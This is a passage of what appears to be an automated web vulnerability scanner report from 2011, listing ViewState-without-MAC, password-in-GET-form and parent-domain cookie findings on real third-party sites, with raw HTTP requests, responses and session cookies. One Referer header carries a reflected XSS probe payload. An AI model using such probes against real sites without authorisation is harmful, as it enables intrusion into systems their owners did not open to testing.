http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems

The form contains the following password field:

password

Request

Response

11.2. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.boston.com
Path:	/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links

The form contains the following password field:

pass

Request

Response

12. ASP.NET ViewState without MAC enabled previous next
There are 11 instances of this issue:

http://umfcluj.ro/
http://umfcluj.ro/Detaliu.aspx
http://umfcluj.ro/contact.aspx
http://umfcluj.ro/en
http://umfcluj.ro/fr
http://umfcluj.ro/lista.aspx
http://umfcluj.ro/search.aspx
http://umfcluj.ro/sitemap.aspx
http://www.cesal.ro/
http://www.netlogiq.ro/
http://www.netlogiq.ro/Portofoliu-Web-Design.html

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

12.1. http://umfcluj.ro/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/

Request

GET / HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:02 GMT
Content-Length: 38701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.2. http://umfcluj.ro/Detaliu.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/Detaliu.aspx

Request

GET /Detaliu.aspx?t=Medicina-dentara-Oferta-educationala HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:36:38 GMT
Content-Length: 61593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJODE0NzU5NDcxZGQ=" />
...[SNIP]...

12.3. http://umfcluj.ro/contact.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/contact.aspx

Request

GET /contact.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:10 GMT
Content-Length: 60428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwMTA5NjQ0MjAPZBYCZg9kFgICAg9kFgICCA9kFgJmD2QWBgIDDxYCHgdWaXNpYmxlaBYCAgcPZBYCAgMPEGRkFCsBAGQCBQ8WAh8AaBYCZg9kFgJmDxYEHglpbm5lcmh0bWxlHwBoZAIHDxYCHwEFGk5pbmNzIGPDrW16ZXR0IHbDoWxhc3p0dmEhZGQ=" />
...[SNIP]...

12.4. http://umfcluj.ro/en previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/en

Request

GET /en HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=RezidentiatPrezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:15:10 GMT
Content-Length: 38709

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>[en]umf</title>
<meta name="description" content="[en]Donec condimentum vestibulum
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.5. http://umfcluj.ro/fr previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/fr

Request

GET /fr HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/lista.aspx?t=Medicina-Prezentare
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: Products=; expires=Mon, 18-Jul-2011 17:28:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:28:16 GMT
Content-Length: 38338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYyNzU5NzVkZA==" />
...[SNIP]...

12.6. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Request

GET /lista.aspx?t=Admitere-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:09 GMT
Content-Length: 81440

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMjEzOTE2MTVkZA==" />
...[SNIP]...

12.7. http://umfcluj.ro/search.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/search.aspx

Request

GET /search.aspx?caut=xss HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/contact.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:33 GMT
Content-Length: 35912

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTAzMzY0NDY4N2Rk" />
...[SNIP]...

12.8. http://umfcluj.ro/sitemap.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/sitemap.aspx

Request

GET /sitemap.aspx HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:30:08 GMT
Content-Length: 104455

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTgxNzg5Njg2MWRk" />
...[SNIP]...

12.9. http://www.cesal.ro/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.cesal.ro
Path:	/

Request

GET / HTTP/1.1
Host: www.cesal.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/Portofoliu-Web-Design.html?6ac71%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E251e3ca71be=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 18:41:29 GMT
Content-Length: 17257

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<title>Adeziv
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTI1NjkxNjIxMmRk" />
...[SNIP]...

12.10. http://www.netlogiq.ro/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/

Request

GET / HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/search.aspx?caut=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:53 GMT
Content-Length: 18673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTgxMjAzNjcwZGQ=" />
...[SNIP]...

12.11. http://www.netlogiq.ro/Portofoliu-Web-Design.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netlogiq.ro
Path:	/Portofoliu-Web-Design.html

Request

GET /Portofoliu-Web-Design.html HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245; sifrFetch=true; __utma=147345704.25025431.1311097255.1311097255.1311097255.1; __utmb=147345704.1.10.1311097255; __utmc=147345704; __utmz=147345704.1311097255.1.1.utmcsr=umfcluj.ro|utmccn=(referral)|utmcmd=referral|utmcct=/search.aspx

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:59 GMT
Content-Length: 223728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTEzMzQyMTQ2MWRk" />
...[SNIP]...

13. Cookie scoped to parent domain previous next
There are 150 instances of this issue:

http://api.twitter.com/1/statuses/user_timeline.json
http://bing.fansnap.com/checkout/ajax_verify_availability
http://bing.fansnap.com/checkout/clickout/415814268
http://bing.fansnap.com/checkout/clickout/418563179
http://bing.fansnap.com/checkout/index/415814268
http://bing.fansnap.com/checkout/index/418563179
http://bing.fansnap.com/la/pi
http://bing.fansnap.com/la/seats-uet
http://bing.fansnap.com/seats/ajax/get_row_data
http://bing.fansnap.com/seats/ajax/get_summary_data
http://bing.fansnap.com/seats/ajax/get_tickets_data
http://bing.fansnap.com/seats/ajax/get_vfs_data
http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669
http://c.microsoft.com/trans_pixel.aspx
https://signin.ebay.com/ws/eBayISAPI.dll
http://t.mookie1.com/t/v1/event
http://www.fansnap.com/
http://www.fansnap.com/developers
http://www.fansnap.com/la/pi
http://www.stubhub.com/
http://a.netmng.com/hic/
http://a.tribalfusion.com/j.ad
http://admeld.adnxs.com/usersync
http://admeld.lucidmedia.com/clicksense/admeld/match
http://ads.revsci.net/adserver/ako
http://adx.adnxs.com/mapuid
http://api.choicestream.com/instr/api/8e360375d27a5381/a1
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/p
http://b.scorecardresearch.com/r
http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02
http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr
http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr
http://bh.contextweb.com/bh/rtset
http://bp.specificclick.net/
http://c.atdmt.com/c.gif
http://c.bing.com/c.gif
http://c.microsoft.com/trans_pixel.asp
http://cdnt.meteorsolutions.com/api/setid
http://cdnt.meteorsolutions.com/api/track
http://clk.atdmt.com/goiframe/213439054/340524297/direct/01
http://clk.specificclick.net/click/v=5
http://d.agkn.com/pixel!t=650!
http://ehg-aaa.hitbox.com/HG
http://g-pixel.invitemedia.com/gmatcher
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071926901/
http://ib.adnxs.com/getuid
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/px
http://ib.adnxs.com/pxj
http://ib.adnxs.com/seg
http://id.google.com/verify/EAAAAPoodblGem1K2ILpk5pXG1k.gif
http://id.google.com/verify/EAAAAPqcMfXpe6-gkMVmI3CbcjA.gif
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/nav/scripts/globalnav.js
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/content_swap.js
http://images.apple.com/global/scripts/lib/event_mixins.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/overlay_panel.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/scripts/swap_view.js
http://images.apple.com/global/scripts/view_master_tracker.js
http://images.apple.com/macpro/scripts/pagenav.js
http://images.apple.com/macpro/scripts/performance.js
http://js.revsci.net/gateway/gw.js
http://m.adnxs.com/msftcookiehandler
http://maps.google.com/maps
http://media.fastclick.net/w/tre
http://odb.outbrain.com/utils/get
http://p.brilig.com/contact/bct
http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js
http://pix04.revsci.net/D08734/a1/0/3/0.js
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://profile.live.com/badge
http://r.turn.com/server/pixel.htm
http://r1-ads.ace.advertising.com/site=808880/size=300250/u=2/bnum=14768994/hr=15/hl=5/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=0/aolexp=0/dref=http%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1113671950/SPONSOR/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/1462300313/INTRO/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/346633134/BILLBOARD/boston/default/empty.gif/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1268261386/LOGO1/boston/bw_house_HIGHLIGHT/651651421411002.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1370466985/HEADLINE2/boston/m_livenat061311_bchm_HEADLINE2/0615_SummerComcast_234.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1374996851/CENTRAL/boston/m_fallon070611_bchm_BIGAD/300x250_bchm_070611-fallon.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/142449885/LOGO5/boston/m_dunkin020111_bchm_SPONSOR/dunkin_yt_logo100x40.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1489951529/HEADLINE1/boston/t_mspca071911_bchm_HEADLINE/234x60_bchm_071911-mspca.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/1687713133/TILE1/boston/g_globeshoplocal051311_bchm_TILE/shoplocal040510_bchm_TILE.html/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/214936665/TOP/boston/c_colonialniss071911_clst_LEADER/colonial_nissan_071511_lb.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_lx.ads/www.boston.com/homepage/default/L31/407535735/LOGO9/boston/c_herbcham0311_bchm_LOGO/hc_toyota_062411_video_sponsor_ad.jpg/726348573830334b61734941426a4977
http://rmedia.boston.com/RealMedia/ads/adstream_mjx.ads/www.boston.com/homepage/default/1108156392@TOP,INTRO,CENTRAL,FOOTER,MICRO1,MICRO2,MICRO3,EXTRA,SPONSOR,TILE1,HEADLINE1,HEADLINE2,LOGO1,LOGO2,LOGO3,LOGO4,LOGO5,LOGO10,LOGO8,LOGO14,BILLBOARD,LOGO9,MISC1,MISC2,MISC3,MISC4,MISC5
http://rover.ebay.com/rover/1/711-53200-19255-0/1
http://rover.ebay.com/roverimp/0/0/14
http://rover.ebay.com/roversync/
http://rt.legolas-media.com/lgrt
http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js
http://seal-alaskaoregonwesternwashington.bbb.org/logo/rbhzbus/realnetworks-43000165.png
http://secure.adnxs.com/seg
http://sitelife.boston.com/ver1.0/Direct/Jsonp
http://sitelife.boston.com/ver1.0/Stats/Tracker.gif
http://srx.main.ebayrtm.com/rtm
https://ssl.bing.com/travel/secure/account/overview
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/450
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://video.msn.com/services/user/info
http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
http://www.burstnet.com/enlightn/7117//930F/
http://www.burstnet.com/enlightn/7121//7128/
http://www.burstnet.com/enlightn/7177//7F4D/
http://www.facebook.com/advertising/
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/ajax/prefetch.php
http://www.facebook.com/badges
http://www.facebook.com/badges/
http://www.facebook.com/campaign/landing.php
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/find-friends
http://www.facebook.com/help/
http://www.facebook.com/mobile
http://www.facebook.com/mobile/
http://www.facebook.com/pages/create.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.gamehouse.com/images/subsidiary.png
http://www.gamestop.com/Recommendations.axd
http://www.stubhub.com/TeaLeafTarget.html
http://www.stubhub.com/assets/default.css
http://www.stubhub.com/content/getPromoContent
http://www.stubhub.com/favicon.ico
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml-popup.js
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-dhtml.css
http://www.stubhub.com/promotions/scratch/foresee_v1/foresee-surveydef.js
http://www.stubhub.com/resources/mojito/img/common/welcome_banner.gif
http://www.ticketmaster.com/json/menu
http://www.ticketmaster.com/json/search/genremenu

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

13.1. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

